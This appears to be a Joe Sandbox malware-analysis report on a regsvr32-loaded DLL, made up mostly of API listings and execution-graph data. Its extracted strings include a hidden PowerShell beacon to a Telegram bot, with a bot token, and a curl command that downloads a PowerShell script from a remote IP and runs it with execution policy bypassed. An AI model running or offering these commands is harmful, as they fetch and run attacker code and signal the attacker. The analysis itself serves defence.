                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                • String ID:
                                                                                                • API String ID: 3136044242-0

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Strings
                                                                                                • powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}", xrefs: 6F95101D
                                                                                                • cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -, xrefs: 6F951010
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: task
                                                                                                • String ID: cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -$powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
                                                                                                • API String ID: 1384045349-2968791885

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(?,?,6F95522C,00000000,6F954D53,?,?,2C12E102,6F954D53,?), ref: 6F955243
                                                                                                • TerminateProcess.KERNEL32(00000000,?,6F95522C,00000000,6F954D53,?,?,2C12E102,6F954D53,?), ref: 6F95524A
                                                                                                • ExitProcess.KERNEL32 ref: 6F95525C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                • String ID:
                                                                                                • API String ID: 1703294689-0

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • __RTC_Initialize.LIBCMT ref: 6F951DCA
                                                                                                  • Part of subcall function 6F95228C: InitializeSListHead.KERNEL32(6F967C70,6F951DD4,6F965708,00000010,6F951D65,?,?,?,6F951F8D,?,00000001,?,?,00000001,?,6F965750), ref: 6F952291
                                                                                                • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6F951E34
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                                • String ID:
                                                                                                • API String ID: 3231365870-0

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • CreateProcessW.KERNELBASE(?,00000001,?,?,?,00000000,?,00000000,00000001,00000000,?,?,?,?,00000000,?), ref: 6F95AEC9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: CreateProcess
                                                                                                • String ID:
                                                                                                • API String ID: 963392458-0

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6F956705,00000001,00000364,00000000,FFFFFFFF,000000FF,?,?,6F956A80,6F9578AD), ref: 6F9578F9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                APIs
                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6F9525B7
                                                                                                • IsDebuggerPresent.KERNEL32 ref: 6F952683
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6F9526A3
                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 6F9526AD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1914644518.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000003.00000002.1914709536.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000003.00000002.1914777697.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000003.00000002.1914837041.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                • String ID:
                                                                                                • API String ID: 254469556-0
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                • String ID: PATH$\
                                                                                                • API String ID: 485612231-1896636505
                                                                                                APIs
                                                                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 6F9541D6
                                                                                                • type_info::operator==.LIBVCRUNTIME ref: 6F9541F8
                                                                                                • ___TypeMatch.LIBVCRUNTIME ref: 6F954307
                                                                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 6F9543D9
                                                                                                • _UnwindNestedFrames.LIBCMT ref: 6F95445D
                                                                                                • CallUnexpected.LIBVCRUNTIME ref: 6F954478
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                • String ID: csm$csm$csm
                                                                                                • API String ID: 2123188842-393685449
                                                                                                APIs
                                                                                                Similarity
                                                                                                • API ID: __freea$__alloca_probe_16$Info
                                                                                                • String ID:
                                                                                                • API String ID: 127012223-0
                                                                                                APIs
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 6F953047
                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 6F95304F
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 6F9530D8
                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 6F953103
                                                                                                • _ValidateLocalCookies.LIBCMT ref: 6F953158
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                • String ID: csm
                                                                                                • API String ID: 1170836740-1018135373
                                                                                                APIs
                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,2C12E102,?,6F95923C,00000000,6F9510C9,00000000,00000000), ref: 6F9591EE
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID: FreeLibrary
                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                • API String ID: 3664257935-537541572
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(00000001,?,6F9531F1,6F952381,6F951D55,?,6F951F8D,?,00000001,?,?,00000001,?,6F965750,0000000C,6F952086), ref: 6F953735
                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6F953743
                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6F95375C
                                                                                                • SetLastError.KERNEL32(00000000,6F951F8D,?,00000001,?,?,00000001,?,6F965750,0000000C,6F952086,?,00000001,?), ref: 6F9537AE
                                                                                                Similarity
                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                • String ID:
                                                                                                • API String ID: 3852720340-0
                                                                                                Strings
                                                                                                • C:\Windows\SysWOW64\regsvr32.exe, xrefs: 6F957FD9
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: C:\Windows\SysWOW64\regsvr32.exe
                                                                                                • API String ID: 0-3922119987
                                                                                                APIs
                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,6F953D2A,00000000,?,00000001,00000000,?,6F953DA1,00000001,FlsFree,6F960E2C,FlsFree,00000000), ref: 6F953CF9
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID: FreeLibrary
                                                                                                • String ID: api-ms-
                                                                                                • API String ID: 3664257935-2084034818
                                                                                                APIs
                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,2C12E102,?,?,00000000,6F95F92D,000000FF,?,6F955258,?,?,6F95522C,00000000), ref: 6F9552F3
                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6F955305
                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,6F95F92D,000000FF,?,6F955258,?,?,6F95522C,00000000), ref: 6F955327
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                • API String ID: 4061214504-1276376045
                                                                                                APIs
                                                                                                • __alloca_probe_16.LIBCMT ref: 6F95B6D9
                                                                                                • __alloca_probe_16.LIBCMT ref: 6F95B7A2
                                                                                                • __freea.LIBCMT ref: 6F95B809
                                                                                                  • Part of subcall function 6F95786A: HeapAlloc.KERNEL32(00000000,00000000,?,?,6F951CD5,00000000,?,6F95175C,00000000,?,6F9510C9,00000000), ref: 6F95789C
                                                                                                • __freea.LIBCMT ref: 6F95B81C
                                                                                                • __freea.LIBCMT ref: 6F95B829
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1914644518.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000003.00000002.1914709536.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000003.00000002.1914777697.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000003.00000002.1914837041.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6f950000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1096550386-0
                                                                                                • Opcode ID: 50eb4319f89d205e16c88159eb3cdaf39520fe7941bd2d0c6b472fdfcfb26144
                                                                                                • Instruction ID: 15b4db24f0c52991273d2f291cd5d2957f38f049bf9de9cdec2bb3f98edc1308
                                                                                                • Opcode Fuzzy Hash: 50eb4319f89d205e16c88159eb3cdaf39520fe7941bd2d0c6b472fdfcfb26144
                                                                                                • Instruction Fuzzy Hash: 7C51A3729012066BEB18CE65DC80EBB7ABDDF94714F154129FE14DA1D1EB31EC6186A0
                                                                                                APIs
                                                                                                • GetConsoleOutputCP.KERNEL32(2C12E102,00000000,00000000,?), ref: 6F95BE59
                                                                                                  • Part of subcall function 6F958B8B: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6F95B7FF,?,00000000,-00000008), ref: 6F958BEC
                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6F95C0AB
                                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6F95C0F1
                                                                                                • GetLastError.KERNEL32 ref: 6F95C194
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1914644518.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000003.00000002.1914709536.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000003.00000002.1914777697.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000003.00000002.1914837041.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6f950000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                • String ID:
                                                                                                • API String ID: 2112829910-0
                                                                                                • Opcode ID: b2a688838fe8bf3955c95837d872743bc7241829b9ad8106a464be17ba41a4c7
                                                                                                • Instruction ID: 5b3195121e167717b88fb6d5c62fec892058d9986fe1edb15ec81f1ed54de01d
                                                                                                • Opcode Fuzzy Hash: b2a688838fe8bf3955c95837d872743bc7241829b9ad8106a464be17ba41a4c7
                                                                                                • Instruction Fuzzy Hash: E5D18A75D042589FDF15CFA8C8809EDBBB8EF0A314F14812AE855AB291D730E952CF50
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1914644518.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000003.00000002.1914709536.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000003.00000002.1914777697.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000003.00000002.1914837041.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6f950000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: AdjustPointer
                                                                                                • String ID:
                                                                                                • API String ID: 1740715915-0
                                                                                                • Opcode ID: 8fd13cb57332c53c0b56804987c53cbba2a86d479b996acbaba7fe73ff76abaf
                                                                                                • Instruction ID: e94c86d600dc1b522e68b7f54a2c045815f7b12591a3e06eb6ac773d160087c9
                                                                                                • Opcode Fuzzy Hash: 8fd13cb57332c53c0b56804987c53cbba2a86d479b996acbaba7fe73ff76abaf
                                                                                                • Instruction Fuzzy Hash: 8B51CC72604606AFEB19CF36D852FAAB7BAEF64314F10412AED15472D1E731E874CB90
                                                                                                APIs
                                                                                                  • Part of subcall function 6F958B8B: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6F95B7FF,?,00000000,-00000008), ref: 6F958BEC
                                                                                                • GetLastError.KERNEL32 ref: 6F957991
                                                                                                • __dosmaperr.LIBCMT ref: 6F957998
                                                                                                • GetLastError.KERNEL32(?,?,?,?), ref: 6F9579D2
                                                                                                • __dosmaperr.LIBCMT ref: 6F9579D9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1914644518.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000003.00000002.1914709536.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000003.00000002.1914777697.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000003.00000002.1914837041.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6f950000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                • String ID:
                                                                                                • API String ID: 1913693674-0
                                                                                                • Opcode ID: 106d213be465e8bbc35f12edc7bc4e2a72873f08a5b858c4c96e4d53c6193b83
                                                                                                • Instruction ID: 78a20d634b7c6c4bc48c33d63c8dfc9a800d1de47c4891f9f1ab74e1c0d8c718
                                                                                                • Opcode Fuzzy Hash: 106d213be465e8bbc35f12edc7bc4e2a72873f08a5b858c4c96e4d53c6193b83
                                                                                                • Instruction Fuzzy Hash: A621B07120471EAF9B50DFB5C99085AB7ADEF01368710C519EE18871D0D730EE31CBA2
                                                                                                APIs
                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 6F958C36
                                                                                                  • Part of subcall function 6F958B8B: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6F95B7FF,?,00000000,-00000008), ref: 6F958BEC
                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F958C6E
                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F958C8E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1914644518.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000003.00000002.1914709536.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000003.00000002.1914777697.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000003.00000002.1914837041.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6f950000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                • String ID:
                                                                                                • API String ID: 158306478-0
                                                                                                • Opcode ID: d9790b809ee6d5fbb68c96597575fae9a4322b63d29cbfb3be0a61eba9aa171a
                                                                                                • Instruction ID: 9347431251b9575f5978865984a4f43ff6e5c38502980fab9cede6ebc57645cd
                                                                                                • Opcode Fuzzy Hash: d9790b809ee6d5fbb68c96597575fae9a4322b63d29cbfb3be0a61eba9aa171a
                                                                                                • Instruction Fuzzy Hash: 0D11A5F151A615BFB71597B58ECCCAF396CDF562A97000114F501952C5EB30ED21C7B1
                                                                                                APIs
                                                                                                • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,6F95D0D7,00000000,00000001,00000000,?,?,6F95C1E8,?,00000000,00000000), ref: 6F95D92D
                                                                                                • GetLastError.KERNEL32(?,6F95D0D7,00000000,00000001,00000000,?,?,6F95C1E8,?,00000000,00000000,?,?,?,6F95C78B,00000000), ref: 6F95D939
                                                                                                  • Part of subcall function 6F95D8FF: CloseHandle.KERNEL32(FFFFFFFE,6F95D949,?,6F95D0D7,00000000,00000001,00000000,?,?,6F95C1E8,?,00000000,00000000,?,?), ref: 6F95D90F
                                                                                                • ___initconout.LIBCMT ref: 6F95D949
                                                                                                  • Part of subcall function 6F95D8C1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6F95D8F0,6F95D0C4,?,?,6F95C1E8,?,00000000,00000000,?), ref: 6F95D8D4
                                                                                                • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,6F95D0D7,00000000,00000001,00000000,?,?,6F95C1E8,?,00000000,00000000,?), ref: 6F95D95E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1914644518.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000003.00000002.1914709536.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000003.00000002.1914777697.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000003.00000002.1914837041.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6f950000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                • String ID:
                                                                                                • API String ID: 2744216297-0
                                                                                                • Opcode ID: 86ea7d3a8b6db4968cf77ff69b9186062e16c007ab02fe31077746fe7a85e8a4
                                                                                                • Instruction ID: 8be10e3987927ed1fee0474222823d1413298eda69ff01bfbbaaef7112f550fb
                                                                                                • Opcode Fuzzy Hash: 86ea7d3a8b6db4968cf77ff69b9186062e16c007ab02fe31077746fe7a85e8a4
                                                                                                • Instruction Fuzzy Hash: 61F0303640A555BBEF165F91DC44A993F77FF093B0B044059FB189A260CB32E930DB91
                                                                                                APIs
                                                                                                • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6F9544A8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.1914681521.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000003.00000002.1914644518.000000006F950000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000003.00000002.1914709536.000000006F960000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000003.00000002.1914777697.000000006F967000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000003.00000002.1914837041.000000006F969000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6f950000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: EncodePointer
                                                                                                • String ID: MOC$RCC
                                                                                                • API String ID: 2118026453-2084237596
                                                                                                • Opcode ID: f0777ed0d399748d5e30526737e154581491d4571748bf396a66f906d37686cd
                                                                                                • Instruction ID: b081194dbf2f0f46654faa82a9f911484b17bc410737f2bd3b4605dd9e6d1423
                                                                                                • Opcode Fuzzy Hash: f0777ed0d399748d5e30526737e154581491d4571748bf396a66f906d37686cd
                                                                                                • Instruction Fuzzy Hash: 8D4159B1900209AFDF05CFA8D891AEE7BB9BF48308F148199F91467291D336E971DF51

                                                                                                Execution Graph

                                                                                                Execution Coverage:5.7%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:0%
                                                                                                Total number of Nodes:1316
                                                                                                Total number of Limit Nodes:19
6f95707a 8063->8072 8064->8059 8067 6f956ff3 8064->8067 8068 6f9570b6 8065->8068 8069 6f957025 CloseHandle 8066->8069 8070 6f95702c 8066->8070 8075 6f957004 8067->8075 8076 6f956ffd CloseHandle 8067->8076 8069->8070 8079 6f95700f 8070->8079 8080 6f957030 CloseHandle 8070->8080 8073 6f957042 CloseHandle 8071->8073 8074 6f957049 8071->8074 8077 6f957085 8072->8077 8078 6f95707e CloseHandle 8072->8078 8073->8074 8074->8079 8081 6f95704d CloseHandle 8074->8081 8075->8079 8083 6f957008 CloseHandle 8075->8083 8076->8075 8084 6f956a8e __freea 14 API calls 8077->8084 8078->8077 8082 6f956a8e __freea 14 API calls 8079->8082 8080->8079 8081->8079 8085 6f95705e 8082->8085 8083->8079 8086 6f95708d 8084->8086 8088 6f956a8e __freea 14 API calls 8085->8088 8087 6f956a8e __freea 14 API calls 8086->8087 8089 6f957099 8087->8089 8090 6f95706a 8088->8090 8091 6f956a8e __freea 14 API calls 8089->8091 8092 6f956a8e __freea 14 API calls 8090->8092 8091->8050 8092->8050 8094 6f9566b8 __dosmaperr 14 API calls 8093->8094 8095 6f956a80 8094->8095 8096 6f954f50 8095->8096 8694 6f954e9c 8096->8694 8104 6f9578c5 _unexpected 8099->8104 8100 6f957905 8103 6f956a7b __dosmaperr 13 API calls 8100->8103 8101 6f9578f0 RtlAllocateHeap 8102 6f956d3e 8101->8102 8101->8104 8102->7990 8106 6f956040 8102->8106 8103->8102 8104->8100 8104->8101 8105 6f9554c6 _Allocate 2 API calls 8104->8105 8105->8104 8107 6f95605c 8106->8107 8108 6f95604e 8106->8108 8109 6f956a7b __dosmaperr 14 API calls 8107->8109 8108->8107 8113 6f956074 8108->8113 8110 6f956064 8109->8110 8112 6f954f50 ___std_exception_copy 39 API calls 8110->8112 8111 6f95606e 8111->7999 8115 6f95a98c 8111->8115 8112->8111 8113->8111 8114 6f956a7b __dosmaperr 14 API calls 8113->8114 8114->8110 8116 6f95a9a8 8115->8116 8119 6f95a99a 8115->8119 8117 6f956a7b __dosmaperr 14 API calls 8116->8117 8118 6f95a9b0 8117->8118 8120 6f954f50 ___std_exception_copy 39 API calls 8118->8120 8119->8116 8122 6f95a9cf 8119->8122 8121 6f956d6b 8120->8121 8121->7999 8124 
6f956a8e 8121->8124 8122->8121 8123 6f956a7b __dosmaperr 14 API calls 8122->8123 8123->8118 8125 6f956ac3 8124->8125 8126 6f956a99 HeapFree 8124->8126 8125->7976 8126->8125 8127 6f956aae GetLastError 8126->8127 8128 6f956abb __dosmaperr 8127->8128 8129 6f956a7b __dosmaperr 12 API calls 8128->8129 8129->8125 8131 6f954f89 8130->8131 8132 6f954d54 CallCatchBlock 8 API calls 8131->8132 8133 6f954f9e GetCurrentProcess TerminateProcess 8132->8133 8133->8003 8135 6f957567 8134->8135 8136 6f95754c 8134->8136 8138 6f957573 8135->8138 8139 6f95758e GetFileAttributesExW 8135->8139 8168 6f956a68 8136->8168 8141 6f956a68 __dosmaperr 14 API calls 8138->8141 8142 6f95759f GetLastError 8139->8142 8149 6f9575ae 8139->8149 8145 6f957578 8141->8145 8171 6f956a21 8142->8171 8144 6f956a7b __dosmaperr 14 API calls 8146 6f957559 8144->8146 8147 6f956a7b __dosmaperr 14 API calls 8145->8147 8148 6f954f50 ___std_exception_copy 39 API calls 8146->8148 8150 6f957580 8147->8150 8151 6f957563 8148->8151 8149->8151 8153 6f956a68 __dosmaperr 14 API calls 8149->8153 8155 6f954f50 ___std_exception_copy 39 API calls 8150->8155 8176 6f951cf9 8151->8176 8157 6f9575c6 8153->8157 8154 6f956a7b __dosmaperr 14 API calls 8154->8151 8155->8151 8156 6f9575ee 8156->7981 8158 6f956a7b __dosmaperr 14 API calls 8157->8158 8159 6f9575ab 8158->8159 8159->8154 8375 6f9576bf 8160->8375 8164 6f957765 8165 6f9576a2 8164->8165 8590 6f9575f0 8165->8590 8183 6f9566b8 GetLastError 8168->8183 8170 6f956a6d 8170->8144 8172 6f956a68 __dosmaperr 14 API calls 8171->8172 8173 6f956a2c __dosmaperr 8172->8173 8174 6f956a7b __dosmaperr 14 API calls 8173->8174 8175 6f956a3f 8174->8175 8175->8159 8177 6f951d01 8176->8177 8178 6f951d02 IsProcessorFeaturePresent 8176->8178 8177->8156 8180 6f952109 8178->8180 8374 6f9520cc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8180->8374 8182 6f9521ec 8182->8156 8184 6f9566ce 8183->8184 8187 6f9566d4 8183->8187 8206 6f9593b7 8184->8206 8204 6f9566d8 
SetLastError 8187->8204 8211 6f9593f6 8187->8211 8189 6f9578b8 _unexpected 12 API calls 8191 6f956705 8189->8191 8192 6f95670d 8191->8192 8193 6f95671e 8191->8193 8194 6f9593f6 _unexpected 6 API calls 8192->8194 8195 6f9593f6 _unexpected 6 API calls 8193->8195 8196 6f95671b 8194->8196 8197 6f95672a 8195->8197 8201 6f956a8e __freea 12 API calls 8196->8201 8198 6f956745 8197->8198 8199 6f95672e 8197->8199 8216 6f956369 8198->8216 8200 6f9593f6 _unexpected 6 API calls 8199->8200 8200->8196 8201->8204 8204->8170 8205 6f956a8e __freea 12 API calls 8205->8204 8221 6f9591f8 8206->8221 8209 6f9593dc 8209->8187 8210 6f9593ee TlsGetValue 8212 6f9591f8 _unexpected 5 API calls 8211->8212 8213 6f959412 8212->8213 8214 6f959430 TlsSetValue 8213->8214 8215 6f9566f0 8213->8215 8215->8189 8215->8204 8236 6f9561fd 8216->8236 8222 6f959224 8221->8222 8223 6f959228 8221->8223 8222->8209 8222->8210 8223->8222 8228 6f95912d 8223->8228 8226 6f959242 GetProcAddress 8226->8222 8227 6f959252 _unexpected 8226->8227 8227->8222 8234 6f95913e ___vcrt_InitializeCriticalSectionEx 8228->8234 8229 6f9591d4 8229->8222 8229->8226 8230 6f95915c LoadLibraryExW 8231 6f959177 GetLastError 8230->8231 8232 6f9591db 8230->8232 8231->8234 8232->8229 8233 6f9591ed FreeLibrary 8232->8233 8233->8229 8234->8229 8234->8230 8235 6f9591aa LoadLibraryExW 8234->8235 8235->8232 8235->8234 8237 6f956209 CallCatchBlock 8236->8237 8250 6f956933 EnterCriticalSection 8237->8250 8239 6f956213 8251 6f956243 8239->8251 8242 6f95630f 8243 6f95631b CallCatchBlock 8242->8243 8255 6f956933 EnterCriticalSection 8243->8255 8245 6f956325 8256 6f9564f0 8245->8256 8247 6f95633d 8260 6f95635d 8247->8260 8250->8239 8254 6f95697b LeaveCriticalSection 8251->8254 8253 6f956231 8253->8242 8254->8253 8255->8245 8257 6f956526 _unexpected 8256->8257 8258 6f9564ff _unexpected 8256->8258 8257->8247 8258->8257 8263 6f95a1ed 8258->8263 8373 6f95697b LeaveCriticalSection 8260->8373 8262 6f95634b 8262->8205 8264 6f95a26d 8263->8264 8267 6f95a203 
